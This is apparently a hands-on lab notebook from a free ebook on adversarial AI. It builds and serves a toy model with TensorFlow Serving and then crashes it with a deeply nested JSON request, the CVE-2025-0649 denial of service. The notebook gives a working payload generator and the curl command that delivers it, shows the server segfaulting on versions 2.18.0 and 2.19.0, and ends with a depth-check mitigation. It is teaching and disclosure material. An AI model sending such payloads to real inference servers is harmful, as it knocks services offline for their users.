<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(attacking_tf_serving_dos.ipynb)*** is part of the series of notebooks from ***A Little Book on Adversarial AI***, a free ebook released by Nik Alleyne.

### Exploiting TF Serving via DoS  
**CVE-2025-0649**
https://nvd.nist.gov/vuln/detail/CVE-2025-0649 

To ensure we are good to go, let us set up a new Docker environment.   

Let us start by preparing a working directory and pulling the Docker image.  

### Create a directory  
In your *tmp* directory, create a folder named **tf_serv_vuln**.   
We do not strictly need this; it just gives us a place to work from if needed.   
$ **mkdir --parents /tmp/tf_serv_vuln**   

Change to the directory   
$ **cd /tmp/tf_serv_vuln/**     


### Get the docker image  
$ **sudo docker pull tensorflow/serving:2.18.0**    

### Confirm the image has been added   
$ **sudo docker images**   


### Lab Objectives:  
- Target a known vulnerability in the inference platform 
- Leverage TFServing for serving models   
- Identify how vulnerabilities in the API endpoint can impact availability  
- Recognize that all a threat actor needs is the ability to interact with your environment; after that, anything is possible.   
- Learn some quick docker usage   


### Step 1:  

In [1]:
# Import the libraries

import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import numpy as np
from sklearn.datasets import make_classification

2025-07-13 17:59:55.081332: I tensorflow/core/util/port.cc:153] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.
2025-07-13 17:59:55.108495: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:467] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered
E0000 00:00:1752443995.139040   67971 cuda_dnn.cc:8579] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered
E0000 00:00:1752443995.148697   67971 cuda_blas.cc:1407] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered
W0000 00:00:1752443995.452015   67971 computation_placer.cc:177] computation placer already registered. Please check linkage and avoid linking 

In [2]:
# On my system, there is a compatibility issue between my Cuda and Tensorflow
# As a result I disable the GPU by default for Tensorflow.
# If Tensorflow is working fine on your system, then feel free to comment out the lines below

# Comment out this line if your GPU works fine in Tensorflow 
print(f'[-] Disabling the GPU')
tf.config.set_visible_devices(devices=[], device_type='GPU')

[-] Disabling the GPU


W0000 00:00:1752444005.895904   67971 gpu_device.cc:2430] TensorFlow was not built with CUDA kernel binaries compatible with compute capability 12.0. CUDA kernels will be jit-compiled from PTX, which could take 30 minutes or longer.


In [3]:
### Version of key libraries used  
print(f'Tensorflow version used:  {tf.__version__}')
print(f'Numpy version used:  {np.__version__}')
print(f'keras version used:  {keras.__version__}')

Tensorflow version used:  2.19.0
Numpy version used:  2.1.3
keras version used:  3.10.0


To ensure this lab can stand on its own, let's build a simple TensorFlow model. This is the model we will serve.

In [4]:
# Get some toy data
X_train, y_train = make_classification(n_samples=100, n_features=4, n_classes=2, random_state=10)

# Get the shape of the data
X_train.shape, y_train.shape

((100, 4), (100,))

Here we build our model   


### Step 2:   

In [5]:
# Set the random number generator
tf.keras.utils.set_random_seed(10)

# Build model
model = keras.Sequential([
    layers.Input(shape=(4,)),
    layers.Dense(units=16, activation='relu', name='first_hidden'),
    layers.Dense(units=8, activation='relu', name='second_hidden'),
    layers.Dense(units=1, activation='sigmoid', name='output')
], name='simple_model')

# Get the model summary
model.summary()

In [6]:
# Compile the model
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

In [7]:
# Train the model for 5 epochs
# The accuracy is not important here
model.fit(X_train, y_train, epochs=5, batch_size=32)

Epoch 1/5


I0000 00:00:1752444018.628577   68137 service.cc:152] XLA service 0x7fdbcc00b020 initialized for platform Host (this does not guarantee that XLA will be used). Devices:
I0000 00:00:1752444018.628810   68137 service.cc:160]   StreamExecutor device (0): Host, Default Version
2025-07-13 18:00:18.721902: I tensorflow/compiler/mlir/tensorflow/utils/dump_mlir_util.cc:269] disabling MLIR crash reproducer, set env var `MLIR_CRASH_REPRODUCER_DIRECTORY` to enable.


1/4 ━━━━━━━━━━━━━━━━━━━━ 6s 2s/step - accuracy: 0.3125 - loss: 0.8268

I0000 00:00:1752444019.702361   68137 device_compiler.h:188] Compiled cluster using XLA!  This line is logged at most once for the lifetime of the process.


4/4 ━━━━━━━━━━━━━━━━━━━━ 3s 179ms/step - accuracy: 0.3450 - loss: 0.7554
Epoch 2/5
4/4 ━━━━━━━━━━━━━━━━━━━━ 0s 16ms/step - accuracy: 0.3450 - loss: 0.7398
Epoch 3/5
4/4 ━━━━━━━━━━━━━━━━━━━━ 0s 15ms/step - accuracy: 0.3511 - loss: 0.7270
Epoch 4/5
4/4 ━━━━━━━━━━━━━━━━━━━━ 0s 14ms/step - accuracy: 0.3511 - loss: 0.7154
Epoch 5/5
4/4 ━━━━━━━━━━━━━━━━━━━━ 0s 16ms/step - accuracy: 0.3603 - loss: 0.7047


<keras.src.callbacks.history.History at 0x7fdf05805e50>

In [8]:
# Give the model a sample to make a prediction
model.predict(np.array([[0.1, 0.2, 0.3, 0.4]]))

1/1 ━━━━━━━━━━━━━━━━━━━━ 0s 267ms/step


array([[0.50004435]], dtype=float32)

With the model built, it has to be exported so that our inference endpoint, TF Serving, can load it. In this case we simply save it under /tmp.

Notice the *1* at the end of the export path. This is important because TF Serving expects each model version to live in its own numbered subdirectory.

### Step 3:  

In [9]:
# Now that we know the model can make predictions let us save it
# Save model in TF Serving format (SavedModel) using new Keras 3 method
export_path = "/tmp/models/my_model/1/"
model.export(export_path)

INFO:tensorflow:Assets written to: /tmp/models/my_model/1/assets




Saved artifact at '/tmp/models/my_model/1/'. The following endpoints are available:

* Endpoint 'serve'
  args_0 (POSITIONAL_ONLY): TensorSpec(shape=(None, 4), dtype=tf.float32, name='keras_tensor')
Output Type:
  TensorSpec(shape=(None, 1), dtype=tf.float32, name=None)
Captures:
  140595846077840: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846081104: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846079952: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846078416: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846081680: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846078800: TensorSpec(shape=(), dtype=tf.resource, name=None)


If you encounter an error such as "... tree: command not found", you will need to install it:   

$ **sudo apt install tree**

In [11]:
# let us verify the structure of our model
!tree /tmp/models

/tmp/models
└── my_model
    └── 1
        ├── assets
        ├── fingerprint.pb
        ├── saved_model.pb
        └── variables
            ├── variables.data-00000-of-00001
            └── variables.index

5 directories, 4 files
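
TF Serving looks for numbered version subdirectories under the model base path, each holding a SavedModel. As a rough alternative to `tree`, the layout can be checked from Python. This is only a sketch: the helper name `find_servable_versions` is hypothetical, and the demo builds a throwaway directory instead of touching /tmp/models.

```python
import tempfile
from pathlib import Path


def find_servable_versions(model_base: Path) -> list[int]:
    """Return the numeric version directories that contain a saved_model.pb."""
    versions = []
    for child in model_base.iterdir():
        # Version directories are named with digits only, e.g. "1"
        if child.is_dir() and child.name.isdigit() and (child / "saved_model.pb").is_file():
            versions.append(int(child.name))
    return sorted(versions)


# Demo on a throwaway directory that mimics /tmp/models/my_model
with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp) / "my_model"
    (base / "1" / "variables").mkdir(parents=True)
    (base / "1" / "saved_model.pb").touch()
    (base / "notes").mkdir()  # ignored: not a numeric version directory
    demo_versions = find_servable_versions(base)

print(demo_versions)
```

To check the real export, call `find_servable_versions(Path("/tmp/models/my_model"))` after running the export cell.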


We have our model, we have our structure, we have TF Serving, let us now serve the model.   

### Step 4:   

With the above in place, let us set up our inference endpoint:   
**sudo docker run --rm -p 8501:8501 --name=tfserving -v "/tmp/models/my_model:/models/vuln_tf_serv" -e MODEL_NAME=vuln_tf_serv  tensorflow/serving:2.18.0**   

If this worked as expected, you should see output such as:   

2025-07-11 20:40:45.255413: I tensorflow_serving/model_servers/server.cc:423] Running gRPC ModelServer at 0.0.0.0:8500 ...    
[warn] getaddrinfo: address family for nodename not supported   
2025-07-11 20:40:45.259994: I tensorflow_serving/model_servers/server.cc:444] Exporting HTTP/REST API at:localhost:8501 ...   
[evhttp_server.cc : 250] NET_LOG: Entering the event loop ...    

To confirm the server is up, run:   
$ **curl http://localhost:8501/v1/models/vuln_tf_serv**   
{   
 "model_version_status": [   
  {   
   "version": "1",   
   "state": "AVAILABLE",   
   "status": {   
    "error_code": "OK",   
    "error_message": ""   
   }   
  }   
 ]   
}   

The above suggests we are good to go. Let us make a prediction.   
$  curl --request POST http://localhost:8501/v1/models/vuln_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI" -d  '{"instances": [[0.1, 0.2, 0.3, 0.4]]}'

If the above runs successfully, you should see the predictions returned, looking something like:    
{   
    "predictions": [[0.500044346]   
    ]   
}   
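
The same status check and prediction request can also be prepared from Python. Below is a minimal sketch using only the standard library. The helper names `is_available` and `build_predict_request` are made up for illustration, and the request is built but not sent, so the block runs even without the container.

```python
import json
import urllib.request

BASE_URL = "http://localhost:8501/v1/models/vuln_tf_serv"


def is_available(status_body: str) -> bool:
    """True if any model version in a status response reports AVAILABLE."""
    status = json.loads(status_body)
    return any(
        version.get("state") == "AVAILABLE"
        for version in status.get("model_version_status", [])
    )


def build_predict_request(instances) -> urllib.request.Request:
    """Build (but do not send) the POST request that the curl command issues."""
    body = json.dumps({"instances": instances}).encode("utf-8")
    return urllib.request.Request(
        url=f"{BASE_URL}:predict",
        data=body,
        headers={"Content-Type": "application/json", "User-Agent": "Adversarial AI"},
        method="POST",
    )


# Status body copied from the curl output shown earlier
sample_status = (
    '{"model_version_status": [{"version": "1", "state": "AVAILABLE", '
    '"status": {"error_code": "OK", "error_message": ""}}]}'
)
request = build_predict_request([[0.1, 0.2, 0.3, 0.4]])
print(is_available(sample_status), request.get_method(), request.full_url)

# With the container running, uncomment to send the request:
# with urllib.request.urlopen(request, timeout=10) as response:
#     print(json.load(response))
```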


Now that we know the inference endpoint is working as expected, let us target it.   


### Step 5:  

In [None]:
# The information being written to the file is nothing exciting
# From a simple perspective, this is what we are doing
# Just that the number of brackets is determined by our recurse_depth variable
'[' * 10 + '0.5' + ']' * 10

In [None]:
# How deep should we recurse.
# Let us start with 1000
recurse_depth = 1000  

# Create a file on the file system
with open(file="/tmp/tf_serv_vuln.json", mode="w") as f:
    # Write to the file
    # This should look similar to what you saw earlier
    f.write('{"instances": ' + ('[' * recurse_depth) + '0.5' + (']' * recurse_depth) + '}')

# verify the file has been created 
!ls /tmp/tf_serv_vuln.json


With the file now available, let's feed it to TF Serving.   
Note the change we made to the data option: **--data-binary @/tmp/tf_serv_vuln.json**   
curl --request POST http://localhost:8501/v1/models/vuln_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI" --data-binary @/tmp/tf_serv_vuln.json   

At this point, in your console you should see something like:  
{
    "error": "tensor parsing error: keras_tensor_4"
}


The above may suggest that the attack did not work. However, let us try something else.  

Let us increase the recursion depth to 50,000. Maybe this will make a difference, maybe it will not. 


### Step 6:  


In [None]:
# Increase recurse_depth to 50_000
recurse_depth = 50_000  

# Create a file on the file system
with open(file="/tmp/tf_serv_vuln.json", mode="w") as f:
    # Write to the file
    # This should look similar to what you saw earlier
    f.write('{"instances": ' + ('[' * recurse_depth) + '0.5' + (']' * recurse_depth) + '}')

# verify the file has been created 
!ls /tmp/tf_serv_vuln.json
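
The two file-writing cells differ only in `recurse_depth`. The sketch below wraps the same string construction in a function (the name `build_nested_payload` is hypothetical) and prints the resulting size, which shows how little data the request actually carries.

```python
def build_nested_payload(depth: int, value: str = "0.5") -> str:
    """Return a predict body whose "instances" value is nested `depth` lists deep."""
    return '{"instances": ' + "[" * depth + value + "]" * depth + "}"


for depth in (10, 1_000, 50_000):
    payload = build_nested_payload(depth)
    # Opening and closing brackets must balance for the body to be valid JSON
    assert payload.count("[") == payload.count("]") == depth
    print(f"depth={depth:>6}  size={len(payload):>7} bytes")
```

At a depth of 50,000 the body is only about 100 KB, so the request is cheap for the sender to produce.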


Run the same command again:   
curl --request POST http://localhost:8501/v1/models/vuln_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI" --data-binary @/tmp/tf_serv_vuln.json

This time, at our curl command prompt, we see:   

$ curl --request POST http://localhost:8501/v1/models/vuln_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI"  --data-binary @/tmp/tf_serv_vuln.json
curl: (52) Empty reply from server    

When we look at the TFServing console we see:  

**/usr/bin/tf_serving_entrypoint.sh: line 3:     7 Segmentation fault      (core dumped) tensorflow_model_server --port=8500 --rest_api_port=8501 --model_name=${MODEL_NAME} --model_base_path=${MODEL_BASE_PATH}/${MODEL_NAME} "$@"**   

We now know we were able to carry out a successful denial of service attack against the inference endpoint: a single request crashed the server process.  
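
From the client side, a crashed server shows up as a dropped or refused connection rather than an HTTP error status, which is what curl reports as `(52) Empty reply from server`. Below is a rough Python sketch for telling the two cases apart. `probe` is a hypothetical helper, and the demo targets a local port with nothing listening as a stand-in for a dead server, not a real TF Serving instance.

```python
import socket
import urllib.error
import urllib.request

# Bypass any system proxy so the request goes straight to the local endpoint
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def probe(url: str, body: bytes, timeout: float = 10.0) -> str:
    """Send `body` as a JSON POST and report how the server reacted."""
    request = urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"}, method="POST"
    )
    try:
        with _opener.open(request, timeout=timeout) as response:
            return f"answered: HTTP {response.status}"
    except urllib.error.HTTPError as err:
        # The server is alive and rejected the request (e.g. a parsing error)
        return f"answered: HTTP {err.code}"
    except OSError as err:
        # Covers refused, reset, dropped, and timed-out connections, which is
        # how a crashed server looks from the client side
        return f"no reply: {type(err).__name__}"


# Demo: grab a free local port, release it, then probe it while nothing listens
with socket.socket() as s:
    s.bind(("127.0.0.1", 0))
    free_port = s.getsockname()[1]

demo_result = probe(
    f"http://127.0.0.1:{free_port}/v1/models/vuln_tf_serv:predict", b"{}", timeout=2.0
)
print(demo_result)
```

Against the lab container, the depth-1000 payload should land in the "answered" branch (the server returns a parsing error), while the depth-50,000 payload should land in the "no reply" branch.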

Let us now try to mitigate this issue by removing this version of TF Serving and installing the latest version instead.   


### Step 7:  


Let us start by removing this version:   
$ sudo docker images
REPOSITORY           TAG       IMAGE ID       CREATED        SIZE   
tensorflow/serving   2.18.0    **ccc3b2242411**   8 months ago   711 MB      

Removing that image    
$ **sudo docker rmi --force ccc3b2242411**
Untagged: tensorflow/serving:2.18.0       


Remove any unused Docker objects and free up some space.   
Realistically, we do not have any in this case, so this is just a little trick to use in the future to clean up.   
Be aware that this removes all unused images, stopped containers, and unused networks on the host.   
$ **sudo docker system prune --all --force**    


Ensure we are good to go   
$ sudo docker images --all
REPOSITORY   TAG       IMAGE ID   CREATED   SIZE



Get the latest version now. At the time of this writing, that is 2.19.0.   
$ **sudo docker pull tensorflow/serving:2.19.0**    


### Step 8:   

Notice the change of the tag at the end, from 2.18.0 to **2.19.0**.

Verify we got the correct image  
$  **sudo docker images --all**   
REPOSITORY           TAG       IMAGE ID       CREATED        SIZE   
tensorflow/serving   2.19.0    d871e064642e   2 months ago   729MB   


Serve the model with the new image:   
**sudo docker run --rm -p 8501:8501 --name=tfserving -v "/tmp/models/my_model:/models/patched_tf_serv" -e MODEL_NAME=patched_tf_serv  tensorflow/serving:2.19.0**   


Verify the server is available:  
$ curl http://localhost:8501/v1/models/patched_tf_serv   


Validate we can still make predictions   

$ curl --request POST http://localhost:8501/v1/models/patched_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI" -d '{"instances": [[0.1, 0.2, 0.3, 0.4]]}'
{
    "predictions": [[0.481608093]
    ]
}


Finally, can we crash the server again?    
Unfortunately, it did crash again.  

$ curl --request POST "http://localhost:8501/v1/models/patched_tf_serv:predict" --header "Content-Type: application/json" --header "User-agent: Adversarial AI" --data-binary @/tmp/tf_serv_vuln.json
curl: (52) Empty reply from server

/usr/bin/tf_serving_entrypoint.sh: line 3:     7 Segmentation fault      (core dumped) tensorflow_model_server --port=8500 --rest_api_port=8501 --model_name=${MODEL_NAME} --model_base_path=${MODEL_BASE_PATH}/${MODEL_NAME} "$@"


I reported this as an issue to the TF Serving team: https://github.com/tensorflow/serving/issues/4116

We will see what they come back with.
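
Since upgrading did not help in this lab, one possible stopgap is to reject deeply nested bodies before they ever reach TF Serving, for example in a gateway or reverse proxy in front of it. The following is a minimal sketch under stated assumptions: `MAX_DEPTH`, `max_nesting_depth`, and `is_acceptable` are hypothetical names, the limit is arbitrary, and none of this is a TF Serving feature. The scan is iterative, so the check itself does not recurse.

```python
MAX_DEPTH = 64  # hypothetical limit; tune it to the input shapes your models accept


def max_nesting_depth(text: str) -> int:
    """Return the deepest level of [] / {} nesting, ignoring brackets inside strings."""
    depth = deepest = 0
    in_string = escaped = False
    for ch in text:
        if in_string:
            if escaped:
                escaped = False  # character after a backslash is taken literally
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
            deepest = max(deepest, depth)
        elif ch in "]}":
            depth -= 1
    return deepest


def is_acceptable(body: str) -> bool:
    """Accept a request body only if its nesting stays within MAX_DEPTH."""
    return max_nesting_depth(body) <= MAX_DEPTH


normal = '{"instances": [[0.1, 0.2, 0.3, 0.4]]}'
hostile = '{"instances": ' + "[" * 50_000 + "0.5" + "]" * 50_000 + "}"
print(max_nesting_depth(normal), is_acceptable(normal))
print(max_nesting_depth(hostile), is_acceptable(hostile))
```

A check like this only measures depth; it does not validate the JSON, so it would sit in front of normal parsing, not replace it.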



### Lab Takeaways:  
- We leveraged TensorFlow Serving for serving our model  
- We saw that version 2.18.0 is vulnerable to a Denial of Service (DoS) attack   
- We saw that, although we were told upgrading would resolve this issue, version 2.19.0 still crashed  